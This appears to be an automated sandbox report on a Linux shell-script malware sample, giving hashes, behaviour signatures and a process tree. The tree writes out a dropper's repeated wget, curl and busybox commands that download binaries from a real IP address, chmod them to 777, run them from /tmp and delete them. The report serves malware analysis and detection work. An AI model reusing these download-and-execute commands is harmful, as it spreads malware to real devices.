Analysis
-
max time kernel
76s -
max time network
78s -
platform
debian-9_mips -
resource
debian9-mipsbe-20240418-en -
resource tags
arch:mipsimage:debian9-mipsbe-20240418-enkernel:4.9.0-13-4kc-maltalocale:en-usos:debian-9-mipssystem -
submitted
21/10/2024, 01:42
Static task
static1
Behavioral task
behavioral1
Sample
c2023304dbd5db2b900e527622714d277b218d0aff1fc1dcb1cff60cb8dbdc6b.sh
Resource
ubuntu1804-amd64-20240729-en
Behavioral task
behavioral2
Sample
c2023304dbd5db2b900e527622714d277b218d0aff1fc1dcb1cff60cb8dbdc6b.sh
Resource
debian9-armhf-20240729-en
Behavioral task
behavioral3
Sample
c2023304dbd5db2b900e527622714d277b218d0aff1fc1dcb1cff60cb8dbdc6b.sh
Resource
debian9-mipsbe-20240418-en
Behavioral task
behavioral4
Sample
c2023304dbd5db2b900e527622714d277b218d0aff1fc1dcb1cff60cb8dbdc6b.sh
Resource
debian9-mipsel-20240729-en
General
-
Target
c2023304dbd5db2b900e527622714d277b218d0aff1fc1dcb1cff60cb8dbdc6b.sh
-
Size
10KB
-
MD5
24af39cdca62a1ed0bec6400cfa74142
-
SHA1
ad31bab8b77d23f47f5ca207a515dfed28a2bd5a
-
SHA256
c2023304dbd5db2b900e527622714d277b218d0aff1fc1dcb1cff60cb8dbdc6b
-
SHA512
24fd5e5bb157fe20152b4811bad30f52b5aa416a3faf7ae5c06d3e7fa6388dcb41d528a9aa87bb6c886380c2cf8457510bc89e7d08ae1096ae8d2da0e1f61476
-
SSDEEP
192:HMUrAEWq+TPsHnmpFoBZFD0+kolLMUrAEaTPsHncpFoBZf:HMUrAEWqF0FmMUrAEp
Malware Config
Signatures
-
File and Directory Permissions Modification 1 TTPs 28 IoCs
Adversaries may modify file or directory permissions to evade defenses.
pid Process 970 chmod 982 chmod 1000 chmod 1006 chmod 877 chmod 871 chmod 898 chmod 904 chmod 988 chmod 994 chmod 844 chmod 964 chmod 976 chmod 892 chmod 922 chmod 952 chmod 766 chmod 946 chmod 940 chmod 916 chmod 928 chmod 801 chmod 865 chmod 886 chmod 910 chmod 934 chmod 958 chmod 781 chmod -
Executes dropped EXE 28 IoCs
ioc pid Process /tmp/RyYfb1MF7l6K3p9GTwT5pnNmx1VEBJ2D8i 767 RyYfb1MF7l6K3p9GTwT5pnNmx1VEBJ2D8i /tmp/Xok7bjctdY8YttSEEDnxwoxpgcX4tB6XHm 782 Xok7bjctdY8YttSEEDnxwoxpgcX4tB6XHm /tmp/CPPlc3Yzj8M2YktAvSEsKF5zPwSOKt0BfA 803 CPPlc3Yzj8M2YktAvSEsKF5zPwSOKt0BfA /tmp/oxUWvwhZOEoMoCgfzN0z8gldLt09ELl7Cw 846 oxUWvwhZOEoMoCgfzN0z8gldLt09ELl7Cw /tmp/OFYM3t3OdXEMZlp13fUl8vLz1Xy4Ybx5cb 866 OFYM3t3OdXEMZlp13fUl8vLz1Xy4Ybx5cb /tmp/aUFzTJBbmAYbPv9lME6JtPK1PKi4P2CT4k 872 aUFzTJBbmAYbPv9lME6JtPK1PKi4P2CT4k /tmp/Ju8QBqA692Dp6a71dtDveu17PKqH4EQ613 878 Ju8QBqA692Dp6a71dtDveu17PKqH4EQ613 /tmp/HUV3uYejTB3G9yxm9AsJMvbGhfnIhIzLGp 887 HUV3uYejTB3G9yxm9AsJMvbGhfnIhIzLGp /tmp/tNxUSt5NhlC5kARq7gvBflueyJlKvkI8O2 893 tNxUSt5NhlC5kARq7gvBflueyJlKvkI8O2 /tmp/6qTzOzmb3L6ewqukpUhPIcAyYefCw8JTOY 899 6qTzOzmb3L6ewqukpUhPIcAyYefCw8JTOY /tmp/7xa0XQLsb9yqlgWs6ukgyy1ccWyq9674Ck 905 7xa0XQLsb9yqlgWs6ukgyy1ccWyq9674Ck /tmp/SYEXOFGkOSMMJY72vpBE4knhEbz9F8R8lG 911 SYEXOFGkOSMMJY72vpBE4knhEbz9F8R8lG /tmp/tZgRyT8CBJsJtAGBs2FKxe54cY3ExQElFv 917 tZgRyT8CBJsJtAGBs2FKxe54cY3ExQElFv /tmp/KiF7nAtQgz8eH47SyrU5i2tM9MoHoikmah 923 KiF7nAtQgz8eH47SyrU5i2tM9MoHoikmah /tmp/tNxUSt5NhlC5kARq7gvBflueyJlKvkI8O2 929 tNxUSt5NhlC5kARq7gvBflueyJlKvkI8O2 /tmp/6qTzOzmb3L6ewqukpUhPIcAyYefCw8JTOY 935 6qTzOzmb3L6ewqukpUhPIcAyYefCw8JTOY /tmp/7xa0XQLsb9yqlgWs6ukgyy1ccWyq9674Ck 941 7xa0XQLsb9yqlgWs6ukgyy1ccWyq9674Ck /tmp/SYEXOFGkOSMMJY72vpBE4knhEbz9F8R8lG 947 SYEXOFGkOSMMJY72vpBE4knhEbz9F8R8lG /tmp/tZgRyT8CBJsJtAGBs2FKxe54cY3ExQElFv 953 tZgRyT8CBJsJtAGBs2FKxe54cY3ExQElFv /tmp/KiF7nAtQgz8eH47SyrU5i2tM9MoHoikmah 959 KiF7nAtQgz8eH47SyrU5i2tM9MoHoikmah /tmp/RyYfb1MF7l6K3p9GTwT5pnNmx1VEBJ2D8i 965 RyYfb1MF7l6K3p9GTwT5pnNmx1VEBJ2D8i /tmp/Xok7bjctdY8YttSEEDnxwoxpgcX4tB6XHm 971 Xok7bjctdY8YttSEEDnxwoxpgcX4tB6XHm /tmp/CPPlc3Yzj8M2YktAvSEsKF5zPwSOKt0BfA 977 CPPlc3Yzj8M2YktAvSEsKF5zPwSOKt0BfA /tmp/oxUWvwhZOEoMoCgfzN0z8gldLt09ELl7Cw 983 oxUWvwhZOEoMoCgfzN0z8gldLt09ELl7Cw /tmp/OFYM3t3OdXEMZlp13fUl8vLz1Xy4Ybx5cb 989 OFYM3t3OdXEMZlp13fUl8vLz1Xy4Ybx5cb /tmp/aUFzTJBbmAYbPv9lME6JtPK1PKi4P2CT4k 995 aUFzTJBbmAYbPv9lME6JtPK1PKi4P2CT4k /tmp/Ju8QBqA692Dp6a71dtDveu17PKqH4EQ613 1001 Ju8QBqA692Dp6a71dtDveu17PKqH4EQ613 /tmp/HUV3uYejTB3G9yxm9AsJMvbGhfnIhIzLGp 1007 HUV3uYejTB3G9yxm9AsJMvbGhfnIhIzLGp -
description ioc Process File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl -
Writes file to tmp directory 28 IoCs
Malware often drops required files in the /tmp directory.
description ioc Process File opened for modification /tmp/RyYfb1MF7l6K3p9GTwT5pnNmx1VEBJ2D8i curl File opened for modification /tmp/OFYM3t3OdXEMZlp13fUl8vLz1Xy4Ybx5cb curl File opened for modification /tmp/oxUWvwhZOEoMoCgfzN0z8gldLt09ELl7Cw curl File opened for modification /tmp/HUV3uYejTB3G9yxm9AsJMvbGhfnIhIzLGp curl File opened for modification /tmp/6qTzOzmb3L6ewqukpUhPIcAyYefCw8JTOY curl File opened for modification /tmp/oxUWvwhZOEoMoCgfzN0z8gldLt09ELl7Cw curl File opened for modification /tmp/CPPlc3Yzj8M2YktAvSEsKF5zPwSOKt0BfA curl File opened for modification /tmp/tZgRyT8CBJsJtAGBs2FKxe54cY3ExQElFv curl File opened for modification /tmp/Ju8QBqA692Dp6a71dtDveu17PKqH4EQ613 curl File opened for modification /tmp/HUV3uYejTB3G9yxm9AsJMvbGhfnIhIzLGp curl File opened for modification /tmp/aUFzTJBbmAYbPv9lME6JtPK1PKi4P2CT4k curl File opened for modification /tmp/7xa0XQLsb9yqlgWs6ukgyy1ccWyq9674Ck curl File opened for modification /tmp/6qTzOzmb3L6ewqukpUhPIcAyYefCw8JTOY curl File opened for modification /tmp/SYEXOFGkOSMMJY72vpBE4knhEbz9F8R8lG curl File opened for modification /tmp/Ju8QBqA692Dp6a71dtDveu17PKqH4EQ613 curl File opened for modification /tmp/tNxUSt5NhlC5kARq7gvBflueyJlKvkI8O2 curl File opened for modification /tmp/7xa0XQLsb9yqlgWs6ukgyy1ccWyq9674Ck curl File opened for modification /tmp/KiF7nAtQgz8eH47SyrU5i2tM9MoHoikmah curl File opened for modification /tmp/RyYfb1MF7l6K3p9GTwT5pnNmx1VEBJ2D8i curl File opened for modification /tmp/Xok7bjctdY8YttSEEDnxwoxpgcX4tB6XHm curl File opened for modification /tmp/CPPlc3Yzj8M2YktAvSEsKF5zPwSOKt0BfA curl File opened for modification /tmp/Xok7bjctdY8YttSEEDnxwoxpgcX4tB6XHm curl File opened for modification /tmp/OFYM3t3OdXEMZlp13fUl8vLz1Xy4Ybx5cb curl File opened for modification /tmp/SYEXOFGkOSMMJY72vpBE4knhEbz9F8R8lG curl File opened for modification /tmp/KiF7nAtQgz8eH47SyrU5i2tM9MoHoikmah curl File opened for modification /tmp/aUFzTJBbmAYbPv9lME6JtPK1PKi4P2CT4k curl File opened for modification /tmp/tNxUSt5NhlC5kARq7gvBflueyJlKvkI8O2 curl File opened for modification /tmp/tZgRyT8CBJsJtAGBs2FKxe54cY3ExQElFv curl
Processes
-
/tmp/c2023304dbd5db2b900e527622714d277b218d0aff1fc1dcb1cff60cb8dbdc6b.sh/tmp/c2023304dbd5db2b900e527622714d277b218d0aff1fc1dcb1cff60cb8dbdc6b.sh1⤵PID:735
-
/bin/rm/bin/rm bins.sh2⤵PID:738
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/RyYfb1MF7l6K3p9GTwT5pnNmx1VEBJ2D8i2⤵PID:742
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/RyYfb1MF7l6K3p9GTwT5pnNmx1VEBJ2D8i2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:764
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/RyYfb1MF7l6K3p9GTwT5pnNmx1VEBJ2D8i2⤵PID:765
-
-
/bin/chmodchmod 777 RyYfb1MF7l6K3p9GTwT5pnNmx1VEBJ2D8i2⤵
- File and Directory Permissions Modification
PID:766
-
-
/tmp/RyYfb1MF7l6K3p9GTwT5pnNmx1VEBJ2D8i./RyYfb1MF7l6K3p9GTwT5pnNmx1VEBJ2D8i2⤵
- Executes dropped EXE
PID:767
-
-
/bin/rmrm RyYfb1MF7l6K3p9GTwT5pnNmx1VEBJ2D8i2⤵PID:768
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/Xok7bjctdY8YttSEEDnxwoxpgcX4tB6XHm2⤵PID:769
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/Xok7bjctdY8YttSEEDnxwoxpgcX4tB6XHm2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:772
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/Xok7bjctdY8YttSEEDnxwoxpgcX4tB6XHm2⤵PID:779
-
-
/bin/chmodchmod 777 Xok7bjctdY8YttSEEDnxwoxpgcX4tB6XHm2⤵
- File and Directory Permissions Modification
PID:781
-
-
/tmp/Xok7bjctdY8YttSEEDnxwoxpgcX4tB6XHm./Xok7bjctdY8YttSEEDnxwoxpgcX4tB6XHm2⤵
- Executes dropped EXE
PID:782
-
-
/bin/rmrm Xok7bjctdY8YttSEEDnxwoxpgcX4tB6XHm2⤵PID:785
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/CPPlc3Yzj8M2YktAvSEsKF5zPwSOKt0BfA2⤵PID:787
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/CPPlc3Yzj8M2YktAvSEsKF5zPwSOKt0BfA2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:790
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/CPPlc3Yzj8M2YktAvSEsKF5zPwSOKt0BfA2⤵PID:799
-
-
/bin/chmodchmod 777 CPPlc3Yzj8M2YktAvSEsKF5zPwSOKt0BfA2⤵
- File and Directory Permissions Modification
PID:801
-
-
/tmp/CPPlc3Yzj8M2YktAvSEsKF5zPwSOKt0BfA./CPPlc3Yzj8M2YktAvSEsKF5zPwSOKt0BfA2⤵
- Executes dropped EXE
PID:803
-
-
/bin/rmrm CPPlc3Yzj8M2YktAvSEsKF5zPwSOKt0BfA2⤵PID:806
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/oxUWvwhZOEoMoCgfzN0z8gldLt09ELl7Cw2⤵PID:808
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/oxUWvwhZOEoMoCgfzN0z8gldLt09ELl7Cw2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:827
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/oxUWvwhZOEoMoCgfzN0z8gldLt09ELl7Cw2⤵PID:828
-
-
/bin/chmodchmod 777 oxUWvwhZOEoMoCgfzN0z8gldLt09ELl7Cw2⤵
- File and Directory Permissions Modification
PID:844
-
-
/tmp/oxUWvwhZOEoMoCgfzN0z8gldLt09ELl7Cw./oxUWvwhZOEoMoCgfzN0z8gldLt09ELl7Cw2⤵
- Executes dropped EXE
PID:846
-
-
/bin/rmrm oxUWvwhZOEoMoCgfzN0z8gldLt09ELl7Cw2⤵PID:849
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/OFYM3t3OdXEMZlp13fUl8vLz1Xy4Ybx5cb2⤵PID:850
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/OFYM3t3OdXEMZlp13fUl8vLz1Xy4Ybx5cb2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:863
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/OFYM3t3OdXEMZlp13fUl8vLz1Xy4Ybx5cb2⤵PID:864
-
-
/bin/chmodchmod 777 OFYM3t3OdXEMZlp13fUl8vLz1Xy4Ybx5cb2⤵
- File and Directory Permissions Modification
PID:865
-
-
/tmp/OFYM3t3OdXEMZlp13fUl8vLz1Xy4Ybx5cb./OFYM3t3OdXEMZlp13fUl8vLz1Xy4Ybx5cb2⤵
- Executes dropped EXE
PID:866
-
-
/bin/rmrm OFYM3t3OdXEMZlp13fUl8vLz1Xy4Ybx5cb2⤵PID:867
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/aUFzTJBbmAYbPv9lME6JtPK1PKi4P2CT4k2⤵PID:868
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/aUFzTJBbmAYbPv9lME6JtPK1PKi4P2CT4k2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:869
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/aUFzTJBbmAYbPv9lME6JtPK1PKi4P2CT4k2⤵PID:870
-
-
/bin/chmodchmod 777 aUFzTJBbmAYbPv9lME6JtPK1PKi4P2CT4k2⤵
- File and Directory Permissions Modification
PID:871
-
-
/tmp/aUFzTJBbmAYbPv9lME6JtPK1PKi4P2CT4k./aUFzTJBbmAYbPv9lME6JtPK1PKi4P2CT4k2⤵
- Executes dropped EXE
PID:872
-
-
/bin/rmrm aUFzTJBbmAYbPv9lME6JtPK1PKi4P2CT4k2⤵PID:873
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/Ju8QBqA692Dp6a71dtDveu17PKqH4EQ6132⤵PID:874
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/Ju8QBqA692Dp6a71dtDveu17PKqH4EQ6132⤵
- Reads runtime system information
- Writes file to tmp directory
PID:875
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/Ju8QBqA692Dp6a71dtDveu17PKqH4EQ6132⤵PID:876
-
-
/bin/chmodchmod 777 Ju8QBqA692Dp6a71dtDveu17PKqH4EQ6132⤵
- File and Directory Permissions Modification
PID:877
-
-
/tmp/Ju8QBqA692Dp6a71dtDveu17PKqH4EQ613./Ju8QBqA692Dp6a71dtDveu17PKqH4EQ6132⤵
- Executes dropped EXE
PID:878
-
-
/bin/rmrm Ju8QBqA692Dp6a71dtDveu17PKqH4EQ6132⤵PID:879
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/HUV3uYejTB3G9yxm9AsJMvbGhfnIhIzLGp2⤵PID:880
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/HUV3uYejTB3G9yxm9AsJMvbGhfnIhIzLGp2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:884
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/HUV3uYejTB3G9yxm9AsJMvbGhfnIhIzLGp2⤵PID:885
-
-
/bin/chmodchmod 777 HUV3uYejTB3G9yxm9AsJMvbGhfnIhIzLGp2⤵
- File and Directory Permissions Modification
PID:886
-
-
/tmp/HUV3uYejTB3G9yxm9AsJMvbGhfnIhIzLGp./HUV3uYejTB3G9yxm9AsJMvbGhfnIhIzLGp2⤵
- Executes dropped EXE
PID:887
-
-
/bin/rmrm HUV3uYejTB3G9yxm9AsJMvbGhfnIhIzLGp2⤵PID:888
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/tNxUSt5NhlC5kARq7gvBflueyJlKvkI8O22⤵PID:889
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/tNxUSt5NhlC5kARq7gvBflueyJlKvkI8O22⤵
- Reads runtime system information
- Writes file to tmp directory
PID:890
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/tNxUSt5NhlC5kARq7gvBflueyJlKvkI8O22⤵PID:891
-
-
/bin/chmodchmod 777 tNxUSt5NhlC5kARq7gvBflueyJlKvkI8O22⤵
- File and Directory Permissions Modification
PID:892
-
-
/tmp/tNxUSt5NhlC5kARq7gvBflueyJlKvkI8O2./tNxUSt5NhlC5kARq7gvBflueyJlKvkI8O22⤵
- Executes dropped EXE
PID:893
-
-
/bin/rmrm tNxUSt5NhlC5kARq7gvBflueyJlKvkI8O22⤵PID:894
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/6qTzOzmb3L6ewqukpUhPIcAyYefCw8JTOY2⤵PID:895
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/6qTzOzmb3L6ewqukpUhPIcAyYefCw8JTOY2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:896
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/6qTzOzmb3L6ewqukpUhPIcAyYefCw8JTOY2⤵PID:897
-
-
/bin/chmodchmod 777 6qTzOzmb3L6ewqukpUhPIcAyYefCw8JTOY2⤵
- File and Directory Permissions Modification
PID:898
-
-
/tmp/6qTzOzmb3L6ewqukpUhPIcAyYefCw8JTOY./6qTzOzmb3L6ewqukpUhPIcAyYefCw8JTOY2⤵
- Executes dropped EXE
PID:899
-
-
/bin/rmrm 6qTzOzmb3L6ewqukpUhPIcAyYefCw8JTOY2⤵PID:900
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/7xa0XQLsb9yqlgWs6ukgyy1ccWyq9674Ck2⤵PID:901
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/7xa0XQLsb9yqlgWs6ukgyy1ccWyq9674Ck2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:902
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/7xa0XQLsb9yqlgWs6ukgyy1ccWyq9674Ck2⤵PID:903
-
-
/bin/chmodchmod 777 7xa0XQLsb9yqlgWs6ukgyy1ccWyq9674Ck2⤵
- File and Directory Permissions Modification
PID:904
-
-
/tmp/7xa0XQLsb9yqlgWs6ukgyy1ccWyq9674Ck./7xa0XQLsb9yqlgWs6ukgyy1ccWyq9674Ck2⤵
- Executes dropped EXE
PID:905
-
-
/bin/rmrm 7xa0XQLsb9yqlgWs6ukgyy1ccWyq9674Ck2⤵PID:906
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/SYEXOFGkOSMMJY72vpBE4knhEbz9F8R8lG2⤵PID:907
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/SYEXOFGkOSMMJY72vpBE4knhEbz9F8R8lG2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:908
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/SYEXOFGkOSMMJY72vpBE4knhEbz9F8R8lG2⤵PID:909
-
-
/bin/chmodchmod 777 SYEXOFGkOSMMJY72vpBE4knhEbz9F8R8lG2⤵
- File and Directory Permissions Modification
PID:910
-
-
/tmp/SYEXOFGkOSMMJY72vpBE4knhEbz9F8R8lG./SYEXOFGkOSMMJY72vpBE4knhEbz9F8R8lG2⤵
- Executes dropped EXE
PID:911
-
-
/bin/rmrm SYEXOFGkOSMMJY72vpBE4knhEbz9F8R8lG2⤵PID:912
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/tZgRyT8CBJsJtAGBs2FKxe54cY3ExQElFv2⤵PID:913
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/tZgRyT8CBJsJtAGBs2FKxe54cY3ExQElFv2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:914
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/tZgRyT8CBJsJtAGBs2FKxe54cY3ExQElFv2⤵PID:915
-
-
/bin/chmodchmod 777 tZgRyT8CBJsJtAGBs2FKxe54cY3ExQElFv2⤵
- File and Directory Permissions Modification
PID:916
-
-
/tmp/tZgRyT8CBJsJtAGBs2FKxe54cY3ExQElFv./tZgRyT8CBJsJtAGBs2FKxe54cY3ExQElFv2⤵
- Executes dropped EXE
PID:917
-
-
/bin/rmrm tZgRyT8CBJsJtAGBs2FKxe54cY3ExQElFv2⤵PID:918
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/KiF7nAtQgz8eH47SyrU5i2tM9MoHoikmah2⤵PID:919
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/KiF7nAtQgz8eH47SyrU5i2tM9MoHoikmah2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:920
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/KiF7nAtQgz8eH47SyrU5i2tM9MoHoikmah2⤵PID:921
-
-
/bin/chmodchmod 777 KiF7nAtQgz8eH47SyrU5i2tM9MoHoikmah2⤵
- File and Directory Permissions Modification
PID:922
-
-
/tmp/KiF7nAtQgz8eH47SyrU5i2tM9MoHoikmah./KiF7nAtQgz8eH47SyrU5i2tM9MoHoikmah2⤵
- Executes dropped EXE
PID:923
-
-
/bin/rmrm KiF7nAtQgz8eH47SyrU5i2tM9MoHoikmah2⤵PID:924
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/tNxUSt5NhlC5kARq7gvBflueyJlKvkI8O22⤵PID:925
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/tNxUSt5NhlC5kARq7gvBflueyJlKvkI8O22⤵
- Reads runtime system information
- Writes file to tmp directory
PID:926
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/tNxUSt5NhlC5kARq7gvBflueyJlKvkI8O22⤵PID:927
-
-
/bin/chmodchmod 777 tNxUSt5NhlC5kARq7gvBflueyJlKvkI8O22⤵
- File and Directory Permissions Modification
PID:928
-
-
/tmp/tNxUSt5NhlC5kARq7gvBflueyJlKvkI8O2./tNxUSt5NhlC5kARq7gvBflueyJlKvkI8O22⤵
- Executes dropped EXE
PID:929
-
-
/bin/rmrm tNxUSt5NhlC5kARq7gvBflueyJlKvkI8O22⤵PID:930
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/6qTzOzmb3L6ewqukpUhPIcAyYefCw8JTOY2⤵PID:931
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/6qTzOzmb3L6ewqukpUhPIcAyYefCw8JTOY2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:932
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/6qTzOzmb3L6ewqukpUhPIcAyYefCw8JTOY2⤵PID:933
-
-
/bin/chmodchmod 777 6qTzOzmb3L6ewqukpUhPIcAyYefCw8JTOY2⤵
- File and Directory Permissions Modification
PID:934
-
-
/tmp/6qTzOzmb3L6ewqukpUhPIcAyYefCw8JTOY./6qTzOzmb3L6ewqukpUhPIcAyYefCw8JTOY2⤵
- Executes dropped EXE
PID:935
-
-
/bin/rmrm 6qTzOzmb3L6ewqukpUhPIcAyYefCw8JTOY2⤵PID:936
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/7xa0XQLsb9yqlgWs6ukgyy1ccWyq9674Ck2⤵PID:937
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/7xa0XQLsb9yqlgWs6ukgyy1ccWyq9674Ck2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:938
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/7xa0XQLsb9yqlgWs6ukgyy1ccWyq9674Ck2⤵PID:939
-
-
/bin/chmodchmod 777 7xa0XQLsb9yqlgWs6ukgyy1ccWyq9674Ck2⤵
- File and Directory Permissions Modification
PID:940
-
-
/tmp/7xa0XQLsb9yqlgWs6ukgyy1ccWyq9674Ck./7xa0XQLsb9yqlgWs6ukgyy1ccWyq9674Ck2⤵
- Executes dropped EXE
PID:941
-
-
/bin/rmrm 7xa0XQLsb9yqlgWs6ukgyy1ccWyq9674Ck2⤵PID:942
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/SYEXOFGkOSMMJY72vpBE4knhEbz9F8R8lG2⤵PID:943
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/SYEXOFGkOSMMJY72vpBE4knhEbz9F8R8lG2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:944
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/SYEXOFGkOSMMJY72vpBE4knhEbz9F8R8lG2⤵PID:945
-
-
/bin/chmodchmod 777 SYEXOFGkOSMMJY72vpBE4knhEbz9F8R8lG2⤵
- File and Directory Permissions Modification
PID:946
-
-
/tmp/SYEXOFGkOSMMJY72vpBE4knhEbz9F8R8lG./SYEXOFGkOSMMJY72vpBE4knhEbz9F8R8lG2⤵
- Executes dropped EXE
PID:947
-
-
/bin/rmrm SYEXOFGkOSMMJY72vpBE4knhEbz9F8R8lG2⤵PID:948
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/tZgRyT8CBJsJtAGBs2FKxe54cY3ExQElFv2⤵PID:949
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/tZgRyT8CBJsJtAGBs2FKxe54cY3ExQElFv2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:950
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/tZgRyT8CBJsJtAGBs2FKxe54cY3ExQElFv2⤵PID:951
-
-
/bin/chmodchmod 777 tZgRyT8CBJsJtAGBs2FKxe54cY3ExQElFv2⤵
- File and Directory Permissions Modification
PID:952
-
-
/tmp/tZgRyT8CBJsJtAGBs2FKxe54cY3ExQElFv./tZgRyT8CBJsJtAGBs2FKxe54cY3ExQElFv2⤵
- Executes dropped EXE
PID:953
-
-
/bin/rmrm tZgRyT8CBJsJtAGBs2FKxe54cY3ExQElFv2⤵PID:954
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/KiF7nAtQgz8eH47SyrU5i2tM9MoHoikmah2⤵PID:955
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/KiF7nAtQgz8eH47SyrU5i2tM9MoHoikmah2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:956
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/KiF7nAtQgz8eH47SyrU5i2tM9MoHoikmah2⤵PID:957
-
-
/bin/chmodchmod 777 KiF7nAtQgz8eH47SyrU5i2tM9MoHoikmah2⤵
- File and Directory Permissions Modification
PID:958
-
-
/tmp/KiF7nAtQgz8eH47SyrU5i2tM9MoHoikmah./KiF7nAtQgz8eH47SyrU5i2tM9MoHoikmah2⤵
- Executes dropped EXE
PID:959
-
-
/bin/rmrm KiF7nAtQgz8eH47SyrU5i2tM9MoHoikmah2⤵PID:960
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/RyYfb1MF7l6K3p9GTwT5pnNmx1VEBJ2D8i2⤵PID:961
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/RyYfb1MF7l6K3p9GTwT5pnNmx1VEBJ2D8i2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:962
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/RyYfb1MF7l6K3p9GTwT5pnNmx1VEBJ2D8i2⤵PID:963
-
-
/bin/chmodchmod 777 RyYfb1MF7l6K3p9GTwT5pnNmx1VEBJ2D8i2⤵
- File and Directory Permissions Modification
PID:964
-
-
/tmp/RyYfb1MF7l6K3p9GTwT5pnNmx1VEBJ2D8i./RyYfb1MF7l6K3p9GTwT5pnNmx1VEBJ2D8i2⤵
- Executes dropped EXE
